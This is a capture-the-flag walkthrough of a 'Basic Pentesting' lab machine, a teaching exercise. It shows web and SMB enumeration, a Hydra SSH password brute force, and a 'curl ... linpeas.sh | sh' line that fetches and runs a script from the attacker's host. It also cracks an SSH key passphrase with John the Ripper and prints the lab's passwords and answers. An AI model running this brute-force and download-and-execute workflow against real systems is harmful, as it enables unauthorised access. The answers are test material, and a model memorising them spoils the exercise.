Basic Pentesting
This is a machine that allows you to practise web app hacking and privilege escalation
💢 We will cover the topics​
- Web Enumeration
- Linux Enumeration
- Brute Forcing Hash
- Brute Forcing SSH Key
Web App Testing and Privilege Escalation​
In these set of tasks you'll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.
Credits to Josiah Pierce from Vulnhub.
- Deploy the machine and connect to our network
No answer needed
- Find the services exposed by the machine
No answer needed
- What is the name of the hidden directory on the web server(enter name without /)?
gobuster dir -u http://10.10.103.107/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.103.107/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/15 08:34:37 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2020/09/15 08:34:54 Finished
===============================================================
development
- User brute-forcing to find the username & password
/usr/share/enum4linux/enum4linux.pl -a $ip | tee enum4linux.log
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Sep 15 08:36:39 2020
==========================
| Target Information |
==========================
Target ........... 10.10.103.107
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.103.107 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for 10.10.103.107 |
=============================================
Looking up status of 10.10.103.107
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
======================================
| Session Check on 10.10.103.107 |
======================================
[+] Server 10.10.103.107 allows sessions using username '', password ''
============================================
| Getting domain SID for 10.10.103.107 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on 10.10.103.107 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at /usr/share/enum4linux/enum4linux.pl line 464.
[+] Got OS info for 10.10.103.107 from smbclient:
[+] Got OS info for 10.10.103.107 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
==============================
| Users on 10.10.103.107 |
==============================
Use of uninitialized value $users in print at /usr/share/enum4linux/enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at /usr/share/enum4linux/enum4linux.pl line 877.
Use of uninitialized value $users in print at /usr/share/enum4linux/enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at /usr/share/enum4linux/enum4linux.pl line 890.
==========================================
| Share Enumeration on 10.10.103.107 |
==========================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.103.107
//10.10.103.107/Anonymous Mapping: OK, Listing: OK
//10.10.103.107/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
=====================================================
| Password Policy Information for 10.10.103.107 |
=====================================================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.103.107 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Trying protocol 445/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
===============================
| Groups on 10.10.103.107 |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on 10.10.103.107 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
[...]
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
[...]
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[...]
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[...]
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
==============================================
| Getting printer info for 10.10.103.107 |
==============================================
No printers returned.
enum4linux complete on Tue Sep 15 08:40:44 2020
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.103.107 ssh
- What is the username?
jan
- What is the password?
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.103.107 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-15 08:39:20
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.103.107:22/
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 14344223 to do in 1343:06h, 16 active
[STATUS] 124.00 tries/min, 372 tries in 00:03h, 14344029 to do in 1927:58h, 16 active
[22][ssh] host: 10.10.103.107 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-15 08:46:06
armando
- What service do you use to access the server(answer in abbreviation in all caps)?
ssh
- Enumerate the machine to find any vectors for privilege escalation
- Hacker:
sudo python3 -m http.server 80 - Target:
curl http://10.8.106.222/linpeas.sh | sh
[+] Files inside others home (limit 20)
/home/kay/.profile
/home/kay/.viminfo
/home/kay/.bashrc
/home/kay/.bash_history
/home/kay/.lesshst
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/home/kay/.bash_logout
/home/kay/.sudo_as_admin_successful
/home/kay/pass.bak
- Copy/Paste
/home/kay/id_rsato Hacker
no answer needed
- What is the name of the other user you found(all lower case)?
kay
- If you have found another user, what can you do with this information?
No answer needed
- What is the final password you obtain?
/usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa.jtr
john --w=/usr/share/wordlists/rockyou.txt kay_id_rsa.jtr
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (kay_id_rsa)
1g 0:00:00:12 DONE (2020-09-15 09:05) 0.08143g/s 1167Kp/s 1167Kc/s 1167KC/sa6_123..*7¡Vamos!
Session completed
ssh -i kay_id_rsa kay@10.10.103.107 Passphrase: beeswax
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
heresareallystrongpasswordthatfollowsthepasswordpolicy$$